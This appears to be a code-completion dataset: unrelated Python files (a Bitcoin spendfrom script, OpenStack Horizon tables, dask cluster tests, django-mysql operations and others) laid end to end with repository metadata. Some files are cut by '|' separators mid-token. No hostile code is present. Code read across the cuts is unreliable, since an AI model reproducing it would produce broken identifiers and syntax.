# but also make sure the bitcoind we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(bitcoind):
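    # If the wallet is encrypted and currently locked, prompt for the passphrase
    # and unlock it for a few seconds; returns True if the wallet is (or becomes) unlocked.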
info = bitcoind.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
bitcoind.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = bitcoind.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(bitcoind):
address_summary = dict()
address_to_account = dict()
for info in bitcoind.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = bitcoind.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = bitcoind.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-bitcoin-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
    outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(bitcoind, fromaddresses, toaddress, amount, fee):
all_coins = list_available(bitcoind)
total_available = Decimal("0.0")
needed = amount+fee
    potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to bitcoind.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = bitcoind.createrawtransaction(inputs, outputs)
signed_rawtx = bitcoind.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(bitcoind, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = bitcoind.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(bitcoind, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = bitcoind.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(bitcoind, txinfo)
total_out = compute_amount_out(txinfo)
        fee = total_in - total_out
        if fee > max_fee:
            raise FeeError("Rejecting transaction, unreasonable fee of "+str(fee))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get bitcoins from")
parser.add_option("--to", dest="to", default=None,
help="address to get send bitcoins to")
parser.add_option("--amount", dest="amount
zouyapeng/horizon-newtouch | openstack_dashboard/dashboards/identity/groups/tables.py | Python | apache-2.0 | 7,450 | 0
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.template import defaultfilters
from django.utils.translation import ugettext_lazy as _
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.groups import constants
LOG = logging.getLogger(__name__)
LOGOUT_URL = 'logout'
STATUS_CHOICES = (
("true", True),
("false", False)
)
class CreateGroupLink(tables.LinkAction):
name = "create"
verbose_name = _("Create Group")
url = constants.GROUPS_CREATE_URL
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("identity", "identity:create_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class EditGroupLink(tables.LinkAction):
name = "edit"
verbose_name = _("Edit Group")
url = constants.GROUPS_UPDATE_URL
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:update_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class DeleteGroupsAction(tables.DeleteAction):
name = "delete"
data_type_singular = _("Group")
data_type_plural = _("Groups")
policy_rules = (("identity", "identity:delete_group"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
def delete(self, request, obj_id):
LOG.info('Deleting group "%s".' % obj_id)
api.keystone.group_delete(request, obj_id)
class ManageUsersLink(tables.LinkAction):
name = "users"
verbose_name = _("Modify Users")
url = constants.GROUPS_MANAGE_URL
icon = "pencil"
policy_rules = (("identity", "identity:get_group"),
("identity", "identity:list_users"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
class GroupFilterAction(tables.FilterAction):
def filter(self, table, groups, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
def comp(group):
if q in group.name.lower():
return True
return False
return filter(comp, groups)
class GroupsTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Name'))
description = tables.Column(lambda obj: getattr(obj, 'description', None),
verbose_name=_('Description'))
id = tables.Column('id', verbose_name=_('Group ID'))
class Meta:
name = "groups"
|
verbose_name = _("Groups")
row_acti
|
ons = (ManageUsersLink, EditGroupLink, DeleteGroupsAction)
table_actions = (GroupFilterAction, CreateGroupLink,
DeleteGroupsAction)
class UserFilterAction(tables.FilterAction):
def filter(self, table, users, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
return [user for user in users
if q in user.name.lower()
or q in getattr(user, 'email', '').lower()]
class RemoveMembers(tables.DeleteAction):
name = "removeGroupMember"
action_present = _("Remove")
action_past = _("Removed")
data_type_singular = _("User")
data_type_plural = _("Users")
policy_rules = (("identity", "identity:remove_user_from_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Removing user %s from group %s.' % (user_obj.id,
group_id))
api.keystone.remove_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when removing current user
# Keystone revokes the token of the user removed from the group.
# If the logon user was removed, redirect the user to logout.
class AddMembersLink(tables.LinkAction):
name = "add_user_link"
verbose_name = _("Add...")
classes = ("ajax-modal",)
icon = "plus"
url = constants.GROUPS_ADD_MEMBER_URL
policy_rules = (("identity", "identity:list_users"),
("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def get_link_url(self, datum=None):
return reverse(self.url, kwargs=self.table.kwargs)
class UsersTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('User Name'))
email = tables.Column('email', verbose_name=_('Email'),
filters=[defaultfilters.escape,
defaultfilters.urlize])
id = tables.Column('id', verbose_name=_('User ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'),
status=True,
status_choices=STATUS_CHOICES,
empty_value="False")
class GroupMembersTable(UsersTable):
class Meta:
name = "group_members"
verbose_name = _("Group Members")
table_actions = (UserFilterAction, AddMembersLink, RemoveMembers)
class AddMembers(tables.BatchAction):
name = "addMember"
action_present = _("Add")
action_past = _("Added")
data_type_singular = _("User")
data_type_plural = _("Users")
icon = "plus"
requires_input = True
success_url = constants.GROUPS_MANAGE_URL
policy_rules = (("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Adding user %s to group %s.' % (user_obj.id,
group_id))
api.keystone.add_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when adding current user
# Keystone revokes the token of the user added to the group.
# If the logon user was added, redirect the user to logout.
def get_success_url(self, request=None):
group_id = self.table.kwargs.get('group_id', None)
return reverse(self.success_url, args=[group_id])
class GroupNonMembersTable(UsersTable):
class Meta:
name = "group_non_members"
verbose_name = _("Non-Members")
table_actions = (UserFilterAction, AddMembers)
schilli/MOPS | MOPS/demo/demo_mean.py | Python | gpl-3.0 | 1,694 | 0.013577
#!/usr/bin/env python
# This is a demonstration of how to compute S2 order parameters from bond vector correlation functions.
# The S2 estimation is done with the method described in:
# Trbovic et al. Proteins (2008). doi:10.1002/prot.21750
from __future__ import print_function, division
import sys, os, glob
import MOPS as mops
import matplotlib.pyplot as plt
# the correlation functions are stored in a subfolder of the current working directory
# after running test_corr.py
corrpath = "./MOPS_test_corr_fit"
if not os.path.isdir(corrpath):
print("No correlation functions found.")
print("Please run test_corr_fit.py first.")
sys.exit(1)
# load correlation functions
corrFilenames = glob.glob(corrpath + '/*.zip')
op = mops.OrderParameter(corrfilenames=corrFilenames)
# predict order parameters, take only converged correlation functions into account
op.estimate("mean", converged=True)
# extract information
S2 = op.S2mean
S2_std = op.S2std
S2_err = op.S2error # = S2.std / <number subtrajectories>
avgcorr = op.avgcorr # correlation function object with averaged correlation functions over all subtrajectories
corr = avgcorr.corr # numerical correlation functions, array of shape = (nresidues, timeframes)
corrlist = op.corrlist # list of correlation functions per subtrajectory
resids = op.avgcorr.resid[0] # residue ID of the first residue of the bond vector
residx = op.avgcorr.resid[0] # residue index (0-based)
resnames = op.avgcorr.resname[0] # residue name
atomnames = op.avgcorr.atomname[0] # atom name
plt.bar(resids, S2, yerr=S2_std)
plt.ylim(0,1)
plt.xlabel('Residue Number')
plt.ylabel(r'S$^2$')
plt.show()
srcc-msu/job_statistics | tagit.py | Python | mit | 1,689 | 0.03138
from optparse import OptionParser
from application.database import global_db
from application.setup import create_app, setup_database, register_blueprints, load_cluster_config
from core.job.models import Job
from core.monitoring.models import JobPerformance
from core.tag.models import JobTag, Tag
from modules.autotag.models import AutoTag
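# run() builds the Flask app, loads the cluster configuration and database, and
# registers blueprints; the tagging itself happens in the before_first_request hook below.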
def run(config: str):
app = create_app(config)
load_cluster_config("cluster_config/", app)
app.logger.info("loading db")
setup_database(app, False)
app.logger.info("loading blueprints")
register_blueprints(app)
return app
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-c", "--config", dest="config", default="dev", help="[dev]elopment or [prod]uction configuration")
parser.add_option("-t", "--t_end", dest="t_end", default=1483025545, help="include tasks completed after [t_end] timestamp")
(options, args) = parser.parse_args()
app = run(options.config)
    @app.before_first_request
def tagit():
print("starting tagging")
conditions = []
for autotag in AutoTag.query.all():
conditions.append((autotag.compile_condition(), Tag.query.get(autotag.fk_tag_id).label))
query = global_db.session \
.query(Job, JobPerformance, JobTag) \
        .filter(Job.t_end > options.t_end) \
.join(JobPerformance)\
.join(JobTag)
for job,perf,job_tag in query.all():
tags = ""
for condition, label in conditions:
try:
if condition(job, perf):
tags += ";{0}".format(label)
except:
pass
print("{0},{1}".format(job.id, tags))
app.run(host=app.config.get("HOST", "localhost"), port=app.config.get("PORT", 5000) + 10, use_reloader=False)
stczhc/neupy | examples/gd/mnist_cnn.py | Python | mit | 1,657 | 0
import theano
import numpy as np
from sklearn.preprocessing import OneHotEncoder
from sklearn import cross_validation, metrics, datasets
from neupy import algorithms, layers, environment
environment.reproducible()
theano.config.floatX = 'float32'
mnist = datasets.fetch_mldata('MNIST original')
target_scaler = OneHotEncoder()
target = mnist.target.reshape((-1, 1))
target = target_scaler.fit_transform(target).todense()
data = mnist.data / 255.
data = data - data.mean(axis=0)
n_samples = data.shape[0]
data = data.reshape((n_samples, 1, 28, 28))
x_train, x_test, y_train, y_test = cross_validation.train_test_split(
data.astype(np.float32),
target.astype(np.float32),
train_size=(6 / 7.)
)
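# Architecture: two 3x3 convolutions with ReLU, 2x2 max-pooling and dropout,
# then a flattening reshape, a dense ReLU layer, dropout, and softmax/argmax
# output over the 10 digit classes.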
network = algorithms.Adadelta(
[
layers.Convolution((32, 1, 3, 3)),
layers.Relu(),
layers.Convolution((48, 32, 3, 3)),
        layers.Relu(),
layers.MaxPooling((2, 2)),
layers.Dropout(0.2),
layers.Reshape(),
layers.Relu(48 * 12 * 12),
layers.Dropout(0.3),
layers.Softmax(200),
layers.ArgmaxOutput(10),
],
error='categorical_crossentropy',
step=1.0,
verbose=True,
shuffle_data=True,
epochs_step_minimizator=8,
addons=[algorithms.SimpleStepMinimization],
)
network.architecture()
network.train(x_train, y_train, x_test, y_test, epochs=6)
y_predicted = network.predict(x_test)
y_test_labels = np.asarray(y_test.argmax(axis=1)).reshape(len(y_test))
print(metrics.classification_report(y_test_labels, y_predicted))
score = metrics.accuracy_score(y_test_labels, y_predicted)
print("Validation accuracy: {:.2f}%".format(100 * score))
ceph/ceph-deploy | ceph_deploy/tests/unit/hosts/test_altlinux.py | Python | mit | 379 | 0.002639
from ceph_deploy.hosts.alt.install import map_components, NON_SPLIT_PACKAGES
class TestALTMapComponents(object):
def test_valid(self):
        pkgs = map_components(NON_SPLIT_PACKAGES, ['ceph-osd', 'ceph-common', 'ceph-radosgw'])
assert 'ceph' in pkgs
assert 'ceph-common' in pkgs
assert 'ceph-radosgw' in pkgs
assert 'ceph-osd' not in pkgs
blaze/distributed | distributed/deploy/tests/test_local.py | Python | bsd-3-clause | 29,495 | 0.000712
import asyncio
from functools import partial
import gc
import subprocess
import sys
from time import sleep
from threading import Lock
import unittest
import weakref
from distutils.version import LooseVersion
from tornado.ioloop import IOLoop
import tornado
from tornado.httpclient import AsyncHTTPClient
import pytest
from dask.system import CPU_COUNT
from distributed import Client, Worker, Nanny, get_client
from distributed.deploy.local import LocalCluster, nprocesses_nthreads
from distributed.metrics import time
from distributed.system import MEMORY_LIMIT
from distributed.utils_test import ( # noqa: F401
clean,
cleanup,
inc,
gen_test,
slowinc,
assert_cannot_connect,
assert_can_connect_locally_4,
assert_can_connect_from_everywhere_4,
assert_can_connect_from_everywhere_4_6,
captured_logger,
tls_only_security,
)
from distributed.utils_test import loop # noqa: F401
from distributed.utils import sync, TimeoutError
from distributed.deploy.utils_test import ClusterTest
def test_simple(loop):
with LocalCluster(
4,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as c:
with Client(c) as e:
x = e.submit(inc, 1)
x.result()
assert x.key in c.scheduler.tasks
assert any(w.data == {x.key: 2} for w in c.workers.values())
assert e.loop is c.loop
def test_local_cluster_supports_blocked_handlers(loop):
with LocalCluster(blocked_handlers=["run_function"], n_workers=0, loop=loop) as c:
with Client(c) as client:
with pytest.raises(ValueError) as exc:
client.run_on_scheduler(lambda x: x, 42)
assert "'run_function' handler has been explicitly disallowed in Scheduler" in str(
exc.value
)
def test_close_twice():
with LocalCluster() as cluster:
with Client(cluster.scheduler_address) as client:
f = client.map(inc, range(100))
client.gather(f)
with captured_logger("tornado.application") as log:
cluster.close()
cluster.close()
sleep(0.5)
log = log.getvalue()
assert not log
def test_procs():
with LocalCluster(
2,
scheduler_port=0,
processes=False,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Worker) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(w.nthreads == 3 for w in c.workers.values())
assert all(isinstance(w, Worker) for w in c.workers.values())
repr(c)
with LocalCluster(
2,
scheduler_port=0,
processes=True,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Nanny) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(v == 3 for v in e.nthreads().values())
c.scale(3)
assert all(isinstance(w, Nanny) for w in c.workers.values())
repr(c)
def test_move_unserializable_data():
"""
Test that unserializable data is still fine to transfer over inproc
transports.
"""
with LocalCluster(
processes=False, silence_logs=False, dashboard_address=None
) as cluster:
assert cluster.scheduler_address.startswith("inproc://")
assert cluster.workers[0].address.startswith("inproc://")
with Client(cluster) as client:
lock = Lock()
x = client.scatter(lock)
y = client.submit(lambda x: x, x)
assert y.result() is lock
def test_transports_inproc():
"""
Test the transport chosen by LocalCluster depending on arguments.
"""
with LocalCluster(
1, processes=False, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("inproc://")
assert c.workers[0].address.startswith("inproc://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp():
# Have nannies => need TCP
with LocalCluster(
1, processes=True, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("tcp://")
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp_port():
# Scheduler port specified => need TCP
with LocalCluster(
1,
processes=False,
scheduler_port=8786,
silence_logs=False,
dashboard_address=None,
) as c:
assert c.scheduler_address == "tcp://127.0.0.1:8786"
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
class LocalTest(ClusterTest, unittest.TestCase):
Cluster = partial(LocalCluster, silence_logs=False, dashboard_address=None)
kwargs = {"dashboard_address": None, "processes": False}
def test_Client_with_local(loop):
with LocalCluster(
1, scheduler_port=0, silence_logs=False, dashboard_address=None, loop=loop
) as c:
with Client(c) as e:
assert len(e.nthreads()) == len(c.workers)
assert c.scheduler_address in repr(c)
def test_Client_solo(loop):
with Client(loop=loop, silence_logs=False) as c:
pass
assert c.cluster.status == "closed"
@gen_test()
async def test_duplicate_clients():
pytest.importorskip("bokeh")
c1 = await Client(
processes=False, silence_logs=False, dashboard_address=9876, asynchronous=True
)
with pytest.warns(Warning) as info:
c2 = await Client(
processes=False,
silence_logs=False,
dashboard_address=9876,
asynchronous=True,
)
assert "dashboard" in c1.cluster.scheduler.services
assert "dashboard" in c2.cluster.scheduler.s
|
ervices
assert any(
all(
word in str(msg.message).lower()
for word in ["9876", "running", "already in use"]
)
for msg in info.list
)
await c1.close()
await c2.close()
def test_Client_kwargs(loop):
with Client(loop=loop, processes=False, n_workers=2, silence_logs=False) as c:
assert len(c.cluster.workers) == 2
assert all(isinstance(w, Worker) for w in c.cluster.workers.values())
assert c.cluster.status == "closed"
def test_Client_unused_kwargs_with_cluster(loop):
with LocalCluster() as cluster:
with pytest.raises(Exception) as argexcept:
c = Client(cluster, n_workers=2, dashboard_port=8000, silence_logs=None)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_unused_kwargs_with_address(loop):
with pytest.raises(Exception) as argexcept:
c = Client(
"127.0.0.1:8786", n_workers=2, dashboard_port=8000, silence_logs=None
)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_twice(loop):
with Client(loop=loop, silence_logs=False, dashboard_address=None) as c:
with Client(loop=loop, silence_logs=False, dashboard_address=None) as f:
assert c.cluster.scheduler.port != f.cluster.scheduler.port
@pytest.mark.asyncio
async def test_client_constructor_with_temporary_security(cleanup):
pytest.importorskip("cryptography")
async with Client(
security=True, silence_logs=False, dashboard_address=None, asynchronous=True
) as c:
assert c.cluster.scheduler_address.startswith("tls")
assert c.security == c.cluster.security
@pytest.mark.asyncio
async def test_defaults(cleanup):
async with Loc
robclewley/compneuro | Ch9_HH_compare.py | Python | bsd-3-clause | 1,267 | 0.007893
"""
Human cortical neuron using A-current model in reduced, 2D version of Hodgkin-Huxley model
Section 9.5
"""
from __future__ import division
from PyDSTool import *
from PyDSTool.Toolbox.phaseplane import *
from common_lib import *
import Ch9_HH_red
import Ch9_HH
gentype='vode' # dopri, euler, etc.
# Parameter An = noise amplitude
#    As = sine wave amplitude
# f = frequency, should be >= 50 Hz
par_args = {'tau_v': 1, 'tau_r': 5.6,
'As': 0, 'f': 700, 'An': 0., 'Iapp': 0.8}
ic_args = {'v':-0.8, 'r': 0.25}
def test_I(gen, Iapp, tmax=300, silent=False):
    gen.set(pars={'Iapp': Iapp},
tdata=[0,tmax])
traj = gen.compute('test')
pts = traj.sample()
    f = freq(traj)
if not silent:
plt.clf()
plt.plot(pts['t'], pts['v'], 'b')
plt.ylim([-0.85, 0.4])
print "Frequency response was:", f
return f
# original version
HH = Ch9_HH.makeHHneuron('HH', par_args, ic_args, const_I=True,
gentype=gentype)
# 2D reduced version
HHred = Ch9_HH_red.makeHHneuron('HHred', par_args, ic_args, const_I=True,
gentype=gentype)
# vary Iapp up to 2
# 0.791 is the closest to the saddle-node bif point to 3 decimal places
test_I(HHred, 0.791, 500)
plt.show()
Rhombik/rhombik-object-repository | searchsettings/templatetags/addSearchContext.py | Python | agpl-3.0 | 669 | 0.014948
from django import template
from filemanager.models import fileobject
from django.shortcuts import get_object_or_404, render_to_response
from django.template.loader import render_to_string
from django.contrib.contenttypes.models import ContentType
register = template.Library()
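# Template tag: concatenate the raw contents of every text-type fileobject
# attached to the object being rendered.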
def raw_text(context):
project=context['object']
object_type = ContentType.objects.get_for_model(project)
projectfiles = fileobject.objects.filter(content_type=object_type,object_id=project.id, filetype="text")
textlist = ""
for i in projectfiles:
textlist = textlist+i.filename.read()
return textlist
register.simple_tag(takes_context=True)(raw_text)
adamchainz/django-mysql | src/django_mysql/operations.py | Python | mit | 5,386 | 0.000928
from __future__ import annotations
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.utils.functional import cached_property
class InstallPlugin(Operation):
reduces_to_sql = False
reversible = True
def __init__(self, name: str, soname: str) -> None:
self.name = name
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if not self.plugin_installed(schema_editor):
schema_editor.execute(
f"INSTALL PLUGIN {self.name} SONAME %s", (self.soname,)
)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if self.plugin_installed(schema_editor):
schema_editor.execute("UNINSTALL PLUGIN %s" % self.name)
def plugin_installed(self, schema_editor: BaseDatabaseSchemaEditor) -> bool:
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*)
FROM INFORMATION_SCHEMA.PLUGINS
WHERE PLUGIN_NAME LIKE %s""",
(self.name,),
)
count = cursor.fetchone()[0]
return count > 0
def describe(self) -> str:
return f"Installs plugin {self.name} from {self.soname}"
class InstallSOName(Operation):
reduces_to_sql = True
reversible = True
def __init__(self, soname: str) -> None:
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("INSTALL SONAME %s", (self.soname,))
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("UNINSTALL SONAME %s", (self.soname,))
def describe(self) -> str:
return "Installs library %s" % (self.soname)
class AlterStorageEngine(Operation):
def __init__(
self, name: str, to_engine: str, from_engine: str | None = None
) -> None:
self.name = name
self.engine = to_engine
self.from_engine = from_engine
@property
def reversible(self) -> bool:
return self.from_engine is not None
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
self._change_engine(app_label, schema_editor, to_state, engine=self.engine)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
if self.from_engine is None:
raise NotImplementedError("You cannot reverse this operation")
self._change_engine(app_label, schema_editor, to_state, engine=self.from_engine)
def _change_engine(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
to_state: ModelState,
engine: str,
) -> None:
new_model = to_state.apps.get_model(app_label, self.name)
qn = schema_editor.connection.ops.quote_name
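        # Consult INFORMATION_SCHEMA first so the ALTER TABLE is skipped when the
        # table already uses the requested storage engine.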
if self.allow_migrate_model( # pragma: no branch
schema_editor.connection.alias, new_model
):
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME = %s AND
ENGINE = %s""",
(new_model._meta.db_table, engine),
)
uses_engine_already = cursor.fetchone()[0] > 0
if uses_engine_already:
return
schema_editor.execute(
"ALTER TABLE {table} ENGINE={engine}".format(
table=qn(new_model._meta.db_table),
engine=engine,
)
)
@cached_property
def name_lower(self) -> str:
return self.name.lower()
def references_model(self, name: str, app_label: str | None = None) -> bool:
return name.lower() == self.name_lower
def describe(self) -> str:
if self.from_engine:
from_clause = f" from {self.from_engine}"
else:
from_clause = ""
return "Alter storage engine for {model}{from_clause} to {engine}".format(
            model=self.name, from_clause=from_clause, engine=self.engine
)
hanya/BookmarksMenu | pythonpath/bookmarks/env/mate.py | Python | apache-2.0 | 42 | 0
OPEN = "mate-open"
FILE_MANAGER = "caja"
qrsforever/workspace | python/learn/base/module/l1/pack/__init__.py | Python | mit | 78 | 0.012821
#!/usr/bin/python2.7
print "__init__"
# __all__ = ['p2']
from big import *
shaggytwodope/progeny | validators.py | Python | gpl-3.0 | 3,149 | 0
PROJECT_DEFAULTS = 'Project Defaults'
PATHS = 'Paths'
_from_config = {
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprints': None
}
_from_args = {
'name': None,
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprint': None
}
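# _from_config and _from_args list the recognized option names; load_config() and
# load_args() below fill copies of them from the config file and the CLI arguments.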
def load_args(args):
from_args = _from_args.copy()
keys = _from_args.keys()
for key in keys:
if args.__contains__(key):
from_args[key] = args.__getattribute__(key)
return from_args
def load_config(config):
from_config = _from_config.copy()
keys = _from_config.keys()
if config:
if config.has_section(PROJECT_DEFAULTS):
for key in keys:
if config.has_option(PROJECT_DEFAULTS, key):
from_config[key] = config.get(PROJECT_DEFAULTS, key)
if config.has_section(PATHS):
for key in keys:
if config.has_option(PATHS, key):
from_config[key] = config.get(PATHS, key)
return from_config
def merge_configged_argged(configged, argged):
merged = configged.copy()
for key in argged.keys():
if True in [key == k for k in configged.keys()]:
# We only care about a None val if the key exists in configged
# this will overwrite the config so that args take percedence
if argged[key] is not None:
merged[key] = argged[key]
else:
# If the key is not already here, then it must be 'footprint', in
# which case we definitely want to include it since that is our
# highest priority and requires less args to generate a project
merged[key] = argged[key]
return merged
def footprint_requires(merged):
required = ['name', 'parent']
passed = 0
pass_requires = len(required)
for r in required:
if r in merged.keys():
if merged[r] is not None:
passed += 1
return passed == pass_requires
def solo_args_requires(args):
required = ['name', 'parent', 'language', 'type']
passed = 0
pass_requires = len(required)
for r in required:
if r in args.keys():
if args[r] is not None:
passed += 1
return passed == pass_requires
def validate_args(args, config):
if config is not None:
configged = load_config(config)
argged = load_args(args)
merged = merge_configged_argged(configged, argged)
# If footprint is provided, we only need name and parent
if merged['footprint'] is not None:
return footprint_requires(merged), merged
# If no footprint, we need name, parent, language, and type to perform
# footprint lookups
if None not in [merged['name'], merged['parent'], merged['language'],
merged['type']]:
return True, merged
return False, merged
argged = load_args(args)
return solo_args_requires(argged), argged
sharadagarwal/autorest | AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/Http/autoresthttpinfrastructuretestservice/operations/http_retry.py | Python | mit | 13,601 | 0.000588
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class HttpRetry(object):
"""HttpRetry operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def head408(
self, custom_headers=None, raw=False, **operation_config):
"""
